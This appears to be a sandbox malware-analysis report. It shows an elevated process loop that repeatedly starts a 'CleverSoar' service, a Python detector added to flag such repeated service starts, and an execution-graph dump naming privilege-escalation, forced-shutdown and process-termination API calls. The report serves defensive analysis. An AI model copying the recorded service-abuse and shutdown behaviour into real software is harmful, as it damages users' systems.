                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:75
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:77
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:80
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:81
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:82
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:83
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:84
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:85
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:86
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:87
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:88
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:89
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:90
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:91
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:92
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:93
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:94
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:95
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:96
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:97
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:98
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:99
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:100
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:101
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:102
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:103
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:104
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:105
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:106
                                                          Start time:01:42:28
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

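The repeated `cmd /c start sc start CleverSoar` / `sc start CleverSoar` / `conhost.exe` triplets above are the kind of pattern a responder wants to pull out of a report mechanically rather than by eye. The following Python is an added example, not Joe Sandbox code: it parses process entries written in the report's own `key:value` layout (the sample text is constructed to mirror entries 97 to 106 above, with a subset of their fields) and flags any service that is started repeatedly inside a short window, recording whether the launching processes held administrator privileges. The service name CleverSoar comes from the command lines above; the two-launch threshold and five-second window are assumptions chosen for illustration.

```python
"""Parse Joe Sandbox-style process entries and flag repeated service starts.

Added example, not Joe Sandbox code. The record layout mirrors the
"Target ID / Start time / Path / Commandline ..." blocks of the report.
SAMPLE_REPORT is constructed to match the entries on the page; the
threshold and window passed to find_repeated_service_starts are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample mirroring the report's process-entry layout (subset of fields).
SAMPLE_REPORT = r"""
Target ID:97
Start time:01:42:27
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has administrator privileges:true
Has exited:true

Target ID:98
Start time:01:42:27
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has administrator privileges:true
Has exited:true

Target ID:99
Start time:01:42:27
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Has administrator privileges:true
Has exited:true

Target ID:100
Start time:01:42:27
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has administrator privileges:true
Has exited:true

Target ID:101
Start time:01:42:27
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has administrator privileges:true
Has exited:true

Target ID:106
Start time:01:42:28
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has administrator privileges:true
Has exited:true
"""

# Matches "sc start <service>" whether typed directly or wrapped in "cmd /c start ...".
SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.IGNORECASE)


def parse_processes(text):
    """Split report text into one dict per 'Target ID' block (blank-line separated)."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # first ':' only; times/paths keep theirs
            if sep:
                fields[key.strip()] = value.strip()
        if "Target ID" in fields:
            procs.append(fields)
    return procs


def started_at(proc):
    """Combine the report's separate date and time fields into one timestamp."""
    return datetime.strptime(proc["Start date"] + " " + proc["Start time"], "%d/%m/%Y %H:%M:%S")


def find_repeated_service_starts(procs, min_count=2, window=timedelta(seconds=5)):
    """Group 'sc start <service>' launches by service name and report any service
    started min_count or more times within `window`, noting whether every launching
    process ran with administrator privileges. conhost entries never match."""
    by_service = defaultdict(list)
    for proc in procs:
        match = SC_START.search(proc.get("Commandline", ""))
        if match:
            by_service[match.group(1)].append(proc)
    findings = []
    for service, launches in by_service.items():
        launches.sort(key=started_at)  # stable sort keeps report order within a second
        first, last = started_at(launches[0]), started_at(launches[-1])
        if len(launches) >= min_count and last - first <= window:
            findings.append({
                "service": service,
                "count": len(launches),
                "target_ids": [p["Target ID"] for p in launches],
                "elevated": all(p.get("Has administrator privileges") == "true" for p in launches),
                "span_seconds": (last - first).total_seconds(),
            })
    return findings


if __name__ == "__main__":
    for finding in find_repeated_service_starts(parse_processes(SAMPLE_REPORT)):
        print(finding)
```

Run against the constructed sample this reports one finding: service CleverSoar, five launches (the three cmd wrappers and the two sc.exe children), all elevated, spanning one second. The cmd wrapper and its sc.exe child are counted separately on purpose; if only the wrapper loop is of interest, filter on `Path` ending in `cmd.exe` before grouping.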

                                                            Execution Graph

                                                            Execution Coverage:1.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:15.1%
                                                            Total number of Nodes:830
                                                            Total number of Limit Nodes:9
                                                            execution_graph: [node/edge listing of the rendered execution graph omitted; the listing is truncated on the page]
                                                            Windows API calls referenced by graph nodes: OpenSCManagerA, CreateToolhelp32Snapshot, CreateProcessA, CreateFileA, CreateFileW, FindFirstFileA, ReadFile, WriteFile, GetFileType, CloseHandle, SetStdHandle, GetConsoleMode, ReadConsoleW, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, NtInitiatePowerAction, ExitWindowsEx, TerminateProcess, Sleep, IsProcessorFeaturePresent, RaiseException, HeapAlloc, HeapFree, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar
                                                            Notable node sequences as listed in the graph: 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction; 6ca9fbe8 ExitWindowsEx Sleep; 6cab02ac and 6ca9e8dd GetCurrentProcess TerminateProcess; 6cc15120 OpenSCManagerA; 6cc15240 CreateToolhelp32Snapshot; 6cc14ff0 CreateProcessA; 6ca95164 CreateFileA CloseHandle
                                                            CRT/STL internals referenced: __wsopen_s, __dosmaperr, _free, _Yarn, _strlen, __Getctype, __cftoe, __fassign, __EH_prolog3, std::_Facet_Register, std::_Lockit::_Lockit, std::locale::_Setgloballocale, std::ios_base::_Ios_base_dtor, std::invalid_argument::invalid_argument, std::_Xinvalid_argument
6ca9b059 std::ios_base::_Ios_base_dtor _strlen 100708->100605 100709 6ca9b42c 100708->100709 100710 6ca9b443 100708->100710 100713 6ca9b3da _Yarn _strlen 100708->100713 100711 6cc16a43 std::_Facet_Register 4 API calls 100709->100711 100712 6cc16a43 std::_Facet_Register 4 API calls 100710->100712 100711->100713 100712->100713 100713->100622 100714 6ca9b79e 100713->100714 100715 6ca9b7b7 100713->100715 100718 6ca9b751 _Yarn 100713->100718 100716 6cc16a43 std::_Facet_Register 4 API calls 100714->100716 100717 6cc16a43 std::_Facet_Register 4 API calls 100715->100717 100716->100718 100717->100718 100719 6cc15960 104 API calls 100718->100719 100720 6ca9b804 std::ios_base::_Ios_base_dtor _strlen 100719->100720 100720->100605 100721 6ca9bc0f 100720->100721 100722 6ca9bc26 100720->100722 100725 6ca9bbbd _Yarn _strlen 100720->100725 100723 6cc16a43 std::_Facet_Register 4 API calls 100721->100723 100724 6cc16a43 std::_Facet_Register 4 API calls 100722->100724 100723->100725 100724->100725 100725->100622 100726 6ca9c08e 100725->100726 100727 6ca9c075 100725->100727 100730 6ca9c028 _Yarn 100725->100730 100729 6cc16a43 std::_Facet_Register 4 API calls 100726->100729 100728 6cc16a43 std::_Facet_Register 4 API calls 100727->100728 100728->100730 100729->100730 100731 6cc15960 104 API calls 100730->100731 100736 6ca9c0db std::ios_base::_Ios_base_dtor _strlen 100731->100736 100732 6ca9c7bc 100735 6cc16a43 std::_Facet_Register 4 API calls 100732->100735 100733 6ca9c7a5 100734 6cc16a43 std::_Facet_Register 4 API calls 100733->100734 100743 6ca9c753 _Yarn _strlen 100734->100743 100735->100743 100736->100605 100736->100732 100736->100733 100736->100743 100737 6ca9d3ed 100739 6cc16a43 std::_Facet_Register 4 API calls 100737->100739 100738 6ca9d406 100740 6cc16a43 std::_Facet_Register 4 API calls 100738->100740 100741 6ca9d39a _Yarn 100739->100741 100740->100741 100742 6cc15960 104 API calls 100741->100742 100744 6ca9d458 std::ios_base::_Ios_base_dtor _strlen 100742->100744 100743->100622 
100743->100737 100743->100738 100743->100741 100749 6ca9cb2f 100743->100749 100744->100605 100745 6ca9d8bb 100744->100745 100746 6ca9d8a4 100744->100746 100750 6ca9d852 _Yarn _strlen 100744->100750 100748 6cc16a43 std::_Facet_Register 4 API calls 100745->100748 100747 6cc16a43 std::_Facet_Register 4 API calls 100746->100747 100747->100750 100748->100750 100750->100622 100751 6ca9dccf 100750->100751 100752 6ca9dcb6 100750->100752 100755 6ca9dc69 _Yarn 100750->100755 100754 6cc16a43 std::_Facet_Register 4 API calls 100751->100754 100753 6cc16a43 std::_Facet_Register 4 API calls 100752->100753 100753->100755 100754->100755 100756 6cc15960 104 API calls 100755->100756 100758 6ca9dd1c std::ios_base::_Ios_base_dtor 100756->100758 100757 6cc14ff0 4 API calls 100757->100686 100758->100605 100758->100757 100760 6cc15156 100759->100760 100761 6cc151e8 OpenServiceA 100760->100761 100762 6cc1522f 100760->100762 100761->100760 100762->100654 100769 6cc003a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100763->100769 100764 6cc0310e CloseHandle 100764->100769 100765 6cc03f5f CloseHandle 100765->100769 100766 6caa37cb 100771 6cc15d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100766->100771 100767 6cbec1e0 WriteFile WriteFile WriteFile ReadFile 100767->100769 100768 6cc0251b CloseHandle 100768->100769 100769->100764 100769->100765 100769->100766 100769->100767 100769->100768 100805 6cbeb730 100769->100805 100771->100620 100772->100649 100774 6cc150ca 100773->100774 100775 6cc15080 WaitForSingleObject CloseHandle CloseHandle 100774->100775 100776 6cc150e3 100774->100776 100775->100774 100776->100658 100777->100669 100779 6cc159b7 100778->100779 100816 6cc15ff0 100779->100816 100781 6cc159c8 100782 6cab6ba0 104 API calls 100781->100782 100789 6cc159ec 100782->100789 100783 6cc15a67 100784 6cade010 67 API calls 100783->100784 100785 6cc15a9f std::ios_base::_Ios_base_dtor 100784->100785 100787 6cade010 67 API calls 
100785->100787 100790 6cc15ae2 std::ios_base::_Ios_base_dtor 100787->100790 100788 6cc15a54 100853 6cc15b90 100788->100853 100789->100783 100789->100788 100835 6cc16340 100789->100835 100843 6caf2000 100789->100843 100790->100708 100793 6cc15a5c 100794 6cab7090 77 API calls 100793->100794 100794->100783 100795->100699 100798 6cc152a0 std::locale::_Setgloballocale 100796->100798 100797 6cc15320 Process32NextW 100797->100798 100798->100797 100799 6cc15277 CloseHandle 100798->100799 100800 6cc153b1 100798->100800 100801 6cc15345 Process32FirstW 100798->100801 100799->100798 100800->100628 100801->100798 100802->100645 100804->100626 100806 6cbeb743 _Yarn __wsopen_s std::locale::_Setgloballocale 100805->100806 100807 6cbec180 100806->100807 100808 6cbebced CreateFileA 100806->100808 100810 6cbeaa30 100806->100810 100807->100769 100808->100806 100811 6cbeaa43 __wsopen_s std::locale::_Setgloballocale 100810->100811 100812 6cbeb3e9 WriteFile 100811->100812 100813 6cbeb43d WriteFile 100811->100813 100814 6cbeb718 100811->100814 100815 6cbeab95 ReadFile 100811->100815 100812->100811 100813->100811 100814->100806 100815->100811 100817 6cc16025 100816->100817 100818 6cae2020 52 API calls 100817->100818 100819 6cc160c6 100818->100819 100820 6cc16a43 std::_Facet_Register 4 API calls 100819->100820 100821 6cc160fe 100820->100821 100822 6cc17327 43 API calls 100821->100822 100823 6cc16112 100822->100823 100824 6cae1d90 89 API calls 100823->100824 100825 6cc161bb 100824->100825 100826 6cc161ec 100825->100826 100868 6cae2250 30 API calls 100825->100868 100826->100781 100828 6cc16226 100869 6cae26e0 24 API calls 4 library calls 100828->100869 100830 6cc16238 100870 6cc19379 RaiseException 100830->100870 100832 6cc1624d 100833 6cade010 67 API calls 100832->100833 100834 6cc1625f 100833->100834 100834->100781 100836 6cc1638d 100835->100836 100871 6cc165a0 100836->100871 100838 6cc1647c 100838->100789 100841 6cc163a5 100841->100838 100889 6cae2250 30 API calls 100841->100889 100890 
6cae26e0 24 API calls 4 library calls 100841->100890 100891 6cc19379 RaiseException 100841->100891 100844 6caf203f 100843->100844 100848 6caf2053 100844->100848 100900 6cae3560 32 API calls std::_Xinvalid_argument 100844->100900 100847 6caf210e 100850 6caf2121 100847->100850 100901 6cae37e0 32 API calls std::_Xinvalid_argument 100847->100901 100848->100847 100902 6cae2250 30 API calls 100848->100902 100903 6cae26e0 24 API calls 4 library calls 100848->100903 100904 6cc19379 RaiseException 100848->100904 100850->100789 100854 6cc15b9e 100853->100854 100858 6cc15bd1 100853->100858 100855 6cae01f0 64 API calls 100854->100855 100857 6cc15bc4 100855->100857 100856 6cc15c83 100856->100793 100859 6cc20b18 67 API calls 100857->100859 100858->100856 100905 6cae2250 30 API calls 100858->100905 100859->100858 100861 6cc15cae 100906 6cae2340 24 API calls 100861->100906 100863 6cc15cbe 100907 6cc19379 RaiseException 100863->100907 100865 6cc15cc9 100866 6cade010 67 API calls 100865->100866 100867 6cc15d22 std::ios_base::_Ios_base_dtor 100866->100867 100867->100793 100868->100828 100869->100830 100870->100832 100872 6cc16608 100871->100872 100873 6cc165dc 100871->100873 100878 6cc16619 100872->100878 100892 6cae3560 32 API calls std::_Xinvalid_argument 100872->100892 100887 6cc16601 100873->100887 100894 6cae2250 30 API calls 100873->100894 100876 6cc167e8 100895 6cae2340 24 API calls 100876->100895 100878->100887 100893 6cae2f60 42 API calls 4 library calls 100878->100893 100879 6cc167f7 100896 6cc19379 RaiseException 100879->100896 100883 6cc16827 100898 6cae2340 24 API calls 100883->100898 100885 6cc1683d 100899 6cc19379 RaiseException 100885->100899 100887->100841 100888 6cc16653 100888->100887 100897 6cae2250 30 API calls 100888->100897 100889->100841 100890->100841 100891->100841 100892->100878 100893->100888 100894->100876 100895->100879 100896->100888 100897->100883 100898->100885 100899->100887 100900->100848 100901->100850 100902->100848 100903->100848 100904->100848 
